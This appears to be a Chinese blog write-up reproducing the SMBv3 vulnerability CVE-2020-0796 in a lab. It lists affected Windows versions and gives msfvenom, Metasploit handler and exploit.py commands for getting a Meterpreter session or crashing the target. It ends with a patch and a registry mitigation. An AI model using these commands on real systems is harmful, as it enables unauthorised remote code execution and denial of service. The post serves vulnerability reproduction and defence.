MySQL數據庫從入門到實戰應用
CVE-2020-0796
Microsoft服務器消息塊3.1.1(SMBv3)協議處理某些請求的方式中存在一個遠程執行代碼漏洞。成功利用此漏洞的攻擊者可以獲得在目標服務器或客戶端上執行代碼的能力。
受影響的系統版本
適用於32位系統的Windows 10版本1903
Windows 10 1903版(用於基於x64的系統)
Windows 10 1903版(用於基於ARM64的系統)
Windows Server 1903版(服務器核心安裝)
適用於32位系統的Windows 10版本1909
Windows 10版本1909(用於基於x64的系統)
Windows 10 1909版(用於基於ARM64的系統)
Windows Server版本1909(服務器核心安裝)
環境搭建
我用的是VMware搭建
環境版本信息
漏洞檢測-掃描
漏洞復現-返回會話
工具下載:
CSDN
GItHub
該Exp使用python3
1.啓動msf
使用msf生成shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt
執行該命令後會在桌面生成一個shellcode.txt
將生成的shellcode替換exp中的exploit.py中的USER_PAYLOAD保存即可。
2.使用kaili中的msf開啓監聽
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #設置反彈模式
msf5 exploit(multi/handler) > set rhost 172.18.9.24
msf5 exploit(multi/handler) > set lport 3333 #設置監聽端口 端口需與上面生成的shellcode一致
msf5 exploit(multi/handler) > run
3.在kali Exp文件夾下執行
python3 exploit.py -ip 172.18.9.24
4.獲得會話 復現成功
漏洞復現-藍屏攻擊
工具下載
CSDN
目標主機藍屏
視頻演示
Getshell
https://www.bilibili.com/video/BV1ZK4y1x7JL/
漏洞修復
下載補丁並安裝補丁鏈接
也可以使用PowerShell命令禁用SMBv3服務的壓縮
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 1 –Force